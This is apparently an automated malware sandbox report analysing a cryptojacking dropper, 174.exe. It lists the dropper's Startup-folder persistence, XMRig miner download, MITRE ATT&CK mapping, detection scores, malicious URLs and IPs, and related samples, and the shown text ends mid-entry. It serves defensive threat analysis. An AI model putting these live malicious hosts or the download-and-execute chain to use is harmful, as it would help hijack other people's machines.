Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Found API chain with Download & Execute functionality

Source: C:\Users\user\Desktop\174.exe

Download & Execute: InternetReadFile,WriteFile,ShellExecute

graph_0-43

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 Windows Service	1 Exploitation for Privilege Escalation	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	12 Registry Run Keys / Startup Folder	1 Windows Service	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	12 Process Injection	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	12 Registry Run Keys / Startup Folder	12 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	23 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 DLL Side-Loading	1 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	12 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
174.exe	42%	Virustotal		Browse
174.exe	47%	ReversingLabs	Win32.Trojan.Crysant
174.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\xmrig\xmrig-6.22.2\xmrig.exe	100%	Avira	HEUR/AGEN.1311679
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	100%	Avira	HEUR/AGEN.1308614
C:\xmrig\xmrig-6.22.2\xmrig.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\xmrig\xmrig-6.22.2\WinRing0x64.sys	5%	ReversingLabs
C:\xmrig\xmrig-6.22.2\xmrig.exe	74%	ReversingLabs	Win64.Trojan.Miner

Source	Detection	Scanner	Label
http://23.27.51.244/chrtrome22.exe/c	0%	Avira URL Cloud	safe
http://23.27.51.244/chrtrome22.exe	0%	Avira URL Cloud	safe
http://evilbit.pro	0%	Avira URL Cloud	safe
http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/	0%	Avira URL Cloud	safe
https://evilbit.pro	0%	Avira URL Cloud	safe
https://miningpoolstats.stream/monero	0%	Avira URL Cloud	safe
https://miningpoolstats.stream/raptoreum	0%	Avira URL Cloud	safe
http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/p	0%	Avira URL Cloud	safe
https://evilbit.pro/config.json	0%	Avira URL Cloud	safe
http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pool-fr.supportxmr.com	141.94.96.144	true	false	unknown
evilbit.pro	104.21.95.99	true	true	unknown
github.com	140.82.121.3	true	false	high
wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun	206.189.156.69	true	true	unknown
wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun	206.189.156.69	true	true	unknown
objects.githubusercontent.com	185.199.109.133	true	false	high
pool.supportxmr.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip	false		high
https://evilbit.pro/config.json	true	Avira URL Cloud: safe	unknown
http://23.27.51.244/chrtrome22.exe	true	Avira URL Cloud: safe	unknown
http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://github.com	chrtrome22.exe, 00000001.00000002.1798535542.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002F76000.00000004.00000800.00020000.00000000.sdmp	false		high
https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/cbb07403-ee0c-	chrtrome22.exe, 00000001.00000002.1798535542.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://miningpoolstats.stream/raptoreum	chrtrome22.exe, 00000001.00000002.1798535542.0000000003064000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000001.00000002.1798535542.0000000003042000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000001.00000002.1798535542.0000000003050000.00000004.00000800.00020000.00000000.sdmp, rtm_ghostrider_example.cmd.1.dr	false	Avira URL Cloud: safe	unknown
https://objects.githubusercontent.com	chrtrome22.exe, 00000001.00000002.1798535542.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://evilbit.pro	chrtrome22.exe, 00000001.00000002.1798535542.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000003021000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com	chrtrome22.exe, 00000001.00000002.1798535542.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://evilbit.pro	chrtrome22.exe, 00000001.00000002.1798535542.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000003021000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://xmrig.com/wizard%s	xmrig.exe, 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe, 0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe.1.dr	false		high
https://xmrig.com/docs/algorithms	xmrig.exe, 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe, 0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe.1.dr	false		high
https://xmrig.com/benchmark/%s	xmrig.exe, 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe, 0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe.1.dr	false		high
http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun	chrtrome22.exe, chrtrome22.exe, 00000006.00000002.1880311970.0000000003155000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://miningpoolstats.stream/monero	chrtrome22.exe, 00000001.00000002.1798535542.000000000302E000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000001.00000002.1798535542.0000000003042000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000001.00000002.1798535542.0000000003021000.00000004.00000800.00020000.00000000.sdmp, pool_mine_example.cmd.1.dr	false	Avira URL Cloud: safe	unknown
https://xmrig.com/wizard	xmrig.exe, 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe, 0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, xmrig.exe.1.dr	false		high
http://objects.githubusercontent.com	chrtrome22.exe, 00000001.00000002.1798535542.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	chrtrome22.exe, 00000001.00000002.1798535542.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	false		high
http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/p	chrtrome22.exe, 00000001.00000002.1798535542.00000000032AB000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.1880311970.0000000003155000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.27.51.244/chrtrome22.exe/c	174.exe, 00000000.00000002.1699645811.0000000000420000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.199.109.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false
23.27.51.244	unknown	United States	18779	EGIHOSTINGUS	false
140.82.121.3	github.com	United States	36459	GITHUBUS	false
206.189.156.69	wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun	United States	14061	DIGITALOCEAN-ASNUS	true
104.21.95.99	evilbit.pro	United States	13335	CLOUDFLARENETUS	true
141.94.96.144	pool-fr.supportxmr.com	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585856
Start date and time:	2025-01-08 11:40:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	174.exe
Detection:	MAL
Classification:	mal100.troj.adwa.evad.mine.winEXE@17/17@6/6
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 53 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45, 20.12.23.50
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target chrtrome22.exe, PID 5808 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:41:02	API Interceptor	86x Sleep call for process: chrtrome22.exe modified
10:40:59	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.199.109.133	cr_asm3.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	gabe.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	5UIy3bo46y.dll	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	HQsitBLlOv.dll	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	OSLdZanXNc.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
	SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll	Get hash	malicious	AsyncRAT, XWorm	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
23.27.51.244	dr0p.exe	Get hash	malicious	Unknown	Browse	23.27.51.244/pkt1.exe
	http://23.27.51.244/dr0p.exe	Get hash	malicious	Unknown	Browse	23.27.51.244/pkt1.exe
	dr0p.exe	Get hash	malicious	Unknown	Browse	23.27.51.244/mh.exe
140.82.121.3	Winscreen.exe	Get hash	malicious	Xmrig	Browse	github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/shell.exe
	stubInf.exe	Get hash	malicious	Xmrig	Browse	github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/Winscreen.exe
	6glRBXzk6i.exe	Get hash	malicious	RedLine	Browse	github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
	firefox.lnk	Get hash	malicious	CobaltStrike	Browse	github.com/john-xor/temp/blob/main/index.html?raw=true
	0XzeMRyE1e.exe	Get hash	malicious	Amadey, Vidar	Browse	github.com/neiqops/ajajaj/raw/main/file_22613.exe
	MzRn1YNrbz.exe	Get hash	malicious	Vidar	Browse	github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
	RfORrHIRNe.doc	Get hash	malicious	Unknown	Browse	github.com/ssbb36/stv/raw/main/5.mp3

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
objects.githubusercontent.com	spreadmalware.exe	Get hash	malicious	XWorm	Browse	185.199.111.133
	https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.199.108.133
	ep_setup.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	ep_setup.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	https://pdf.ac/3eQ2md	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	185.199.108.133
	https://github.com/starise/win11-virtual-desktop-extension/releases/download/1.1.0/VirtualDesktopExtension-1.1.0.msi	Get hash	malicious	Unknown	Browse	185.199.108.133
	in.exe	Get hash	malicious	Babadeda, HTMLPhisher	Browse	185.199.111.133
	https://github.com/greenshot/greenshot/releases/download/Greenshot-RELEASE-1.2.10.6/Greenshot-INSTALLER-1.2.10.6-RELEASE.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	Dfim58cp4J.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.199.110.133
github.com	spreadmalware.exe	Get hash	malicious	XWorm	Browse	140.82.121.3
	Customer.exe	Get hash	malicious	XWorm	Browse	140.82.121.4
	Solara Bootstrapper.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	Solara.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	PO#6100008 Jan04.02.2024.Xls.js	Get hash	malicious	WSHRat, STRRAT	Browse	140.82.121.4
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	140.82.121.3
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	140.82.121.4
	ipmsg5.6.18_installer.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	eXbhgU9.exe	Get hash	malicious	LummaC	Browse	140.82.121.4
pool-fr.supportxmr.com	file.exe	Get hash	malicious	Xmrig	Browse	141.94.96.144
	SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe	Get hash	malicious	Xmrig	Browse	141.94.96.71
	file.exe	Get hash	malicious	Xmrig	Browse	141.94.96.71
	egFMhHSlmf.exe	Get hash	malicious	Xmrig	Browse	141.94.96.71
	xmr_linux_amd64 (2).elf	Get hash	malicious	Xmrig	Browse	141.94.96.195
	xmr_linux_amd64.elf	Get hash	malicious	Xmrig	Browse	141.94.96.195
	SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe	Get hash	malicious	Xmrig	Browse	141.94.96.144
	Q3pEXxmWAD.exe	Get hash	malicious	Xmrig	Browse	141.94.96.195
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar, Xmrig	Browse	141.94.96.71
	kWYLtJ0Cn1.exe	Get hash	malicious	LoaderBot, Xmrig	Browse	141.94.96.195

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIGITALOCEAN-ASNUS	3.elf	Get hash	malicious	Unknown	Browse	157.245.194.36
	i686.elf	Get hash	malicious	Mirai	Browse	188.166.182.194
	random.exe	Get hash	malicious	CStealer	Browse	159.89.102.253
	random.exe	Get hash	malicious	CStealer	Browse	159.89.102.253
	https://www.clubgets.com/pursuit.php?a_cd=%2A%2A%2A%2A%2A&b_cd=0018&link=https://zion.com.sg/gVBN1ASF7vQWE3IOP6IOP6VBN1ABC2cQWE3ZXC0VBN1QWE3IOP6VBN1XYZ1mASF7PPL6QAZ3ERT4QWE3ABC2cASF7m	Get hash	malicious	HTMLPhisher	Browse	104.248.23.102
	miori.arm5.elf	Get hash	malicious	Unknown	Browse	159.89.3.52
	i686.elf	Get hash	malicious	Mirai	Browse	188.166.182.194
	i686.elf	Get hash	malicious	Mirai	Browse	157.230.1.135
	mpsl.elf	Get hash	malicious	Mirai	Browse	157.245.2.217
	http://click.pstmrk.it	Get hash	malicious	Unknown	Browse	161.35.235.194
FASTLYUS	https://www.dollartip.info/unsubscribe/?d=mdlandrec.net	Get hash	malicious	Unknown	Browse	199.232.188.157
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	185.199.111.133
	Subscription_Renewal_Invoice_2025_HKVXTC.html	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://url12.mailanyone.net/scanner?m=1tUshS-0000000041D-2l2S&d=4%7Cmail%2F90%2F1736191200%2F1tUshS-0000000041D-2l2S%7Cin12g%7C57e1b682%7C21208867%7C12850088%7C677C2DBECB224D1EED07A26760DE755E&o=%2Fphtp%3A%2Fjtssamcce.ehst.uruirrevam.ctstro%2Fe%3D%2F%3Fixprceetmeat%3Dmn%26aeileplttm%26920%3D09s1-oFmyiSNtMTnafi%25iosctgp40norajmcm.c8p%3D5o%26991dd-86e2ee-4a-9879e6-de5f1dd.%232e.%3D302vp%3D0%26%25ttsdhF23Ap%252a%25Fuii.ctr.vro2omastr%25Fi2ge2ap%25%25FelFp%25cisoie52F21d9c876-89-4e9dd8-9d-d6ea215f22e%25eeFtFde%252maadata%3Da%26kdtuK8rJIg9jKP6GiBXfDGI7Fp%25Lddn2sRxJdhuPpjWD3%25ICb37&s=3NJIrjRA01UUg3P9bWqXPHrWXdk	Get hash	malicious	Unknown	Browse	151.101.129.140
	YOUR TV LICENCE STATEMENT.pdf	Get hash	malicious	HTMLPhisher	Browse	151.101.2.132
	https://www.overflix.gay/ksisjep	Get hash	malicious	Unknown	Browse	151.101.65.44
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=evsqlwgFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#test@kghm.com	Get hash	malicious	Unknown	Browse	151.101.1.91
	http://plnbl.io/review/VdCYQSoKp54z	Get hash	malicious	HTMLPhisher	Browse	151.101.195.9
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, XWorm, Xmrig	Browse	185.199.110.133
	https://sUNg.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.com	Get hash	malicious	Unknown	Browse	151.101.2.137
EGIHOSTINGUS	miori.arm.elf	Get hash	malicious	Unknown	Browse	192.177.167.22
	sora.ppc.elf	Get hash	malicious	Unknown	Browse	107.187.170.67
	sora.mips.elf	Get hash	malicious	Mirai	Browse	107.187.145.80
	dr0p.exe	Get hash	malicious	Unknown	Browse	23.27.51.244
	http://23.27.51.244/dr0p.exe	Get hash	malicious	Unknown	Browse	23.27.51.244
	https://dreamsmaybachawuradekasa.org/?dococbwt&qrc=ZHlsYW4uZHVmZnk4QHlhaG9vLmNvbQ==	Get hash	malicious	Unknown	Browse	23.27.244.219
	dr0p.exe	Get hash	malicious	Unknown	Browse	23.27.51.244
	armv6l.elf	Get hash	malicious	Unknown	Browse	136.0.151.194
	2.elf	Get hash	malicious	Unknown	Browse	107.164.241.37
	31.13.224.14-mips-2025-01-03T22_14_18.elf	Get hash	malicious	Mirai	Browse	192.177.167.92
GITHUBUS	spreadmalware.exe	Get hash	malicious	XWorm	Browse	140.82.121.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, XWorm, Xmrig	Browse	140.82.121.4
	Customer.exe	Get hash	malicious	XWorm	Browse	140.82.121.4
	Solara Bootstrapper.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	Solara.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	PO#6100008 Jan04.02.2024.Xls.js	Get hash	malicious	WSHRat, STRRAT	Browse	140.82.121.4
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	140.82.121.3
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	140.82.121.4
	ipmsg5.6.18_installer.exe	Get hash	malicious	Unknown	Browse	140.82.121.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	spreadmalware.exe	Get hash	malicious	XWorm	Browse	140.82.121.3 104.21.95.99 185.199.109.133
	invoice-1623385214.pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	140.82.121.3 104.21.95.99 185.199.109.133
	invoice-1623385214 pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	140.82.121.3 104.21.95.99 185.199.109.133
	0a0#U00a0.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	140.82.121.3 104.21.95.99 185.199.109.133
	c2.hta	Get hash	malicious	Remcos	Browse	140.82.121.3 104.21.95.99 185.199.109.133
	http://xyft.zmdusdxj.ru	Get hash	malicious	Unknown	Browse	140.82.121.3 104.21.95.99 185.199.109.133
	Globalfoundries eCHECK- Payment Advice.html	Get hash	malicious	Unknown	Browse	140.82.121.3 104.21.95.99 185.199.109.133
	c2.hta	Get hash	malicious	Remcos	Browse	140.82.121.3 104.21.95.99 185.199.109.133
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	140.82.121.3 104.21.95.99 185.199.109.133

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\xmrig\xmrig-6.22.2\WinRing0x64.sys	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, XWorm, Xmrig	Browse
	47SXvEQ.exe	Get hash	malicious	Blank Grabber, Xmrig	Browse
	xmr new.exe	Get hash	malicious	Xmrig	Browse
	eth.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	hiwA7Blv7C.exe	Get hash	malicious	Xmrig	Browse
	5fr5gthkjdg71.exe	Get hash	malicious	Quasar, R77 RootKit	Browse
	aAcx14Rjtw.exe	Get hash	malicious	Xmrig	Browse
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse
	0Ty.png.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chrtrome22.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	4144
Entropy (8bit):	5.362092442072351
Encrypted:	false
SSDEEP:	96:iqbYqGSI6ozajtIzQ0cxYsAmSvBjwQYrKxmDRtzHeqKkCq10tpDuqDqjq+qs:iqbYqGcRIzQ0JyZtzHeqKkCq10tpDuqM
MD5:	C44BBB53B45AD54426D7114A75BF92F7
SHA1:	6880CC43427F746B2A95991A4227E2AFF730D8BB
SHA-256:	59980AEFCD665E616F6BEA75C32277E8EF14977C20033370623F1FCE78DC904F
SHA-512:	9421173BBC774551C24498720DB0F67459621E832BE265A7527797C14D419D09A0C9986E7ECAE9331D810C3F78645E851E11B321075FD0C5C592500EB8D4578C
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"Microsoft.PowerShell.Commands.Diagnostics, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\37a5ed6e6a6a48d370ee34b13c3e2b37\Microsoft.PowerShell.Commands.Diagnostics.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53de4dqd.zjo.psm1

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
